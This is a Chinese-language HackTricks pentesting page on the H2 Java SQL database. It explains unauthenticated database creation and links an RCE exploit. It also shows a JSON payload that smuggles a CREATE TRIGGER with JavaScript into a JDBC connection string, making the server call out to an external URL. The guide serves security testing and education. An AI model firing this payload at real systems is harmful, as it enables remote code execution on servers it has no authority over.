hacktricks/network-services-pentesting/pentesting-web/h2-java-sql-database.md

3.5 KiB
Raw Blame History

H2 - Java SQL 数据库

从零开始学习 AWS 黑客攻击直到成为英雄 htARTE (HackTricks AWS 红队专家)

支持 HackTricks 的其他方式:

官方页面:https://www.h2database.com/html/main.html

访问

您可以指定一个不存在的数据库名称以便在没有有效凭据的情况下创建新数据库未经认证

或者,如果您知道例如一个 mysql 正在运行 并且您知道该数据库的数据库名称凭据,您可以直接访问它:

来自 HTB Hawk 盒子的技巧。

RCE

如果您能够与 H2 数据库通信,请检查此漏洞以在其上获得 RCEhttps://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed

H2 SQL 注入到 RCE

这篇文章中,解释了一个通过滥用SQL 注入H2 数据库上获得 RCE 的有效载荷。

[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
从零到英雄学习AWS黑客攻击 htARTE (HackTricks AWS Red Team Expert)

支持HackTricks的其他方式